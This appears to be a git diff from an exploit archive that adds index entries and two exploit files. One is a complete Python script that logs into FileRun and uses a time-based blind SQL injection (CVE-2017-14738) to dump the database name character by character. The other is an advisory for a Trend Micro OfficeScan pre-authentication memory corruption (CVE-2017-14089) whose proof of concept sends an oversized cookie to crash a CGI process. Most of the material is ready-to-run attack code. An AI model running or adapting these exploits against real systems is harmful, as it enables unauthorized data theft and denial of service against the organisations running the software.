diff --git a/files.csv b/files.csv index fb33ea662..b04c009e3 100644 --- a/files.csv +++ b/files.csv @@ -5689,6 +5689,7 @@ id,file,description,date,author,platform,type,port 42782,platforms/multiple/dos/42782.txt,"Adobe Flash - Out-of-Bounds Write in MP4 Edge Processing",2017-09-25,"Google Security Research",multiple,dos,0 42783,platforms/multiple/dos/42783.txt,"Adobe Flash - Out-of-Bounds Read in applyToRange",2017-09-25,"Google Security Research",multiple,dos,0 42917,platforms/windows/dos/42917.py,"DiskBoss Enterprise 8.4.16 - Local Buffer Overflow (PoC)",2017-09-28,"Touhid M.Shaikh",windows,dos,0 +42920,platforms/windows/dos/42920.py,"Trend Micro OfficeScan 11.0/XG (12.0) - Memory Corruption",2017-09-29,hyp3rlinx,windows,dos,0 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0 @@ -38600,3 +38601,4 @@ id,file,description,date,author,platform,type,port 42895,platforms/php/webapps/42895.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - 'Host' Header Injection",2017-09-28,hyp3rlinx,php,webapps,0 42916,platforms/hardware/webapps/42916.py,"Roteador Wireless Intelbras WRN150 - Autentication Bypass",2017-09-28,"Elber Tavares",hardware,webapps,0 42919,platforms/php/webapps/42919.txt,"Easy Blog PHP Script 1.3a - 'id' Parameter SQL Injection",2017-09-28,8bitsec,php,webapps,0 +42922,platforms/php/webapps/42922.py,"FileRun <= 2017.09.18 - SQL Injection",2017-09-29,SPARC,php,webapps,0 diff --git a/platforms/php/webapps/42922.py b/platforms/php/webapps/42922.py new file mode 100755 index 000000000..e399835f1 --- /dev/null +++ b/platforms/php/webapps/42922.py @@ -0,0 +1,100 @@ +#!/usr/bin/env python +# Exploit Title: FileRun <=2017.09.18 +# Date: September 29, 2017 +# Exploit Author: SPARC +# Vendor Homepage: https://www.filerun.com/ +# Software Link: http://f.afian.se/wl/?id=EHQhXhXLGaMFU7jI8mYNRN8vWkG9LUVP&recipient=d3d3LmZpbGVydW4uY29t +# Version: 2017.09.18 +# Tested on: Ubuntu 16.04.3, Apache 2.4.7, PHP 7.0 +# CVE : CVE-2017-14738 +# + +import sys,time,urllib,urllib2,cookielib +from time import sleep + +print """ +#===============================================================# +| | +| ___| | | +| \___ \ __ \ _ \ __ \ __| _ \ __| _` | | +| | | | __/ | | | __/ | ( | | +| _____/ .__/ \___|_| _|\__|\___|_| \__,_| | +| _| | +| | +| FileRun <= 2017.09.18 | +| BlindSQLi Proof of Concept (Post Authentication) | +| by Spentera Research (research[at]spentera.id) | +| | +#===============================================================# +""" + + +host = raw_input("[*] Target IP: ") +username = raw_input("[*] Username: ") +password = raw_input("[*] Password: ") +target = 'http://%s/?module=search§ion=ajax&page=grid' %(host) +delay=1 +global cookie,data + + + +def masuk(usr,pswd): + log_data = { + 'username': usr, + 'password': pswd + } + + post_data = urllib.urlencode(log_data) + cookjar = cookielib.CookieJar() + opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookjar)) + try: + req = urllib2.Request('http://%s/?module=fileman&page=login&action=login'%(host), post_data) + content = opener.open(req) + global data,cookie + data = dict((cookie.name, cookie.value) for cookie in cookjar) + cookie = ("language=english; FileRunSID=%s"%(data['FileRunSID'])) + return str(content.read()) + except: + print '\n[-] Uh oh! Exploit fail.. PLEASE CHECK YOUR CREDENTIAL' + sys.exit(0) + +def konek(m,n): + #borrow from SQLmap :) + query=("7) AND (SELECT * FROM (SELECT(SLEEP(%s-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),%s,1))>%s,0,1)))))wSmD) AND (8862=8862" %(delay,m,n)) + values = { 'metafield': query, + 'searchType': 'meta', + 'keyword': 'work', + 'searchPath': '/ROOT/HOME', + 'path': '/ROOT/SEARCH' } + + req = urllib2.Request(target, urllib.urlencode(values)) + req.add_header('Cookie', cookie) + try: + starttime=time.time() + response = urllib2.urlopen(req) + endtime = time.time() + return int(endtime-starttime) + + except: + print '\n[-] Uh oh! Exploit fail..' + sys.exit(0) + +print "[+] Logging in to the application..." +sleep(1) +cekmasuk = masuk(username,password) +if u'success' in cekmasuk: + print "[*] Using Time-Based method with %ds delay."%int(delay) + print "[+] Starting to dump current database. This might take time.." + sys.stdout.write('[+] Target current database is: ') + sys.stdout.flush() + + starttime = time.time() + for m in range(1,256): + for n in range(32,126): + wkttunggu = konek(m,n) + if (wkttunggu < delay): + sys.stdout.write(chr(n)) + sys.stdout.flush() + break + endtime = time.time() + print "\n[+] Done in %d seconds" %int(endtime-starttime) \ No newline at end of file diff --git a/platforms/windows/dos/42920.py b/platforms/windows/dos/42920.py new file mode 100755 index 000000000..1dba88481 --- /dev/null +++ b/platforms/windows/dos/42920.py @@ -0,0 +1,109 @@ +[+] Credits: John Page (aka hyp3rlinx) +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/CVE-2017-14089-TRENDMICRO-OFFICESCAN-XG-PRE-AUTH-REMOTE-MEMORY-CORRUPTION.txt +[+] ISR: ApparitionSec + + + +Vendor: +================== +www.trendmicro.com + + + +Product: +======== +OfficeScan +v11.0 and XG (12.0)* + + +OfficeScan protects enterprise networks from malware, network viruses, web-based threats, spyware, and mixed threat attacks. +An integrated solution, OfficeScan consists of the OfficeScan agent program that resides at the endpoint and a server program that +manages all agents. The OfficeScan agent guards the endpoint and reports its security status to the server. The server, through the +web-based management console, makes it easy to set coordinated security policies and deploy updates to every agent. + + +Vulnerability Type: +=================== +Unauthorized Remote Memory Corruption + + + +CVE Reference: +============== +CVE-2017-14089 + + + +Security Issue: +================ +Remote unauthenticated attackers that can make connection the TrendMicro OfficeScan XG application targeting the "cgiShowClientAdm.exe" +process can cause memory corruption issues. + + +References: +=========== +https://success.trendmicro.com/solution/1118372 + + + +Exploit/POC: +============= +import urllib,urllib2 +from urllib2 import Request + +print 'TrendMicro OfficeScan XG' +print 'Stack Memory Corruption POC' +print 'by hyp3rlinx\n' + +IP="VICTIM-IP:4343" + +PAYLOAD="A"*256 + +url = urllib2.Request('https://'+IP+'/officescan/console/html/cgi/cgiShowClientAdm.exe') +cookie="Cookie: serror=0; session_expired=no; FeatureEnableState=enableAntiBody@1|enableCCFR@1|enableCfw@1|enableDcs@1|enableSorting@0|enableSpy@1|enableVirus@1|HasAvAddSvc@1|installWSS@1|enableDLP@0|sqldbMode@0|enableIPv6@1|w2ksupport@0|; stamp=2231521137; timestamp=1497360567; DisabledIds=9999.; LogonUser=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA; ReadOnlyIds=8.56.; enableRba=1; key=16914202097564; session=666; LANG=en_US; PHPSESSID=WHATEVER123; lastID=34; lastTab=-1; theme=default; wf_CSRF_token=99999999999999999999999999999999; serror=0; retry=0; PHPSESSID=WHATEVERHERE; wf_CSRF_token=666; LANG=en_US; theme=default; lastID=33; lastTab=-1" + +print '\nsending packetz... \n'+ cookie + +##url.add_header("X-CSRFToken", "ee721b62aef83b017e8c86f52e38a411") #<============== X-CSRFToken IS NOT EVEN NEEDED! +url.add_header("Content-Type", "application/x-www-form-urlencoded; charset=utf-8") +url.add_header("Content-Length", "54") +url.add_header("Cookie ",cookie) + +req=urllib2.urlopen(url) +res = urllib2.urlopen(req) +print res + + + + +Network Access: +=============== +Remote + + + + +Severity: +========= +High + + + +Disclosure Timeline: +==================== +Vendor Notification: June 5, 2017 +Vendor releases fixes / advisory : September 27, 2017 +September 28, 2017 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). + +hyp3rlinx \ No newline at end of file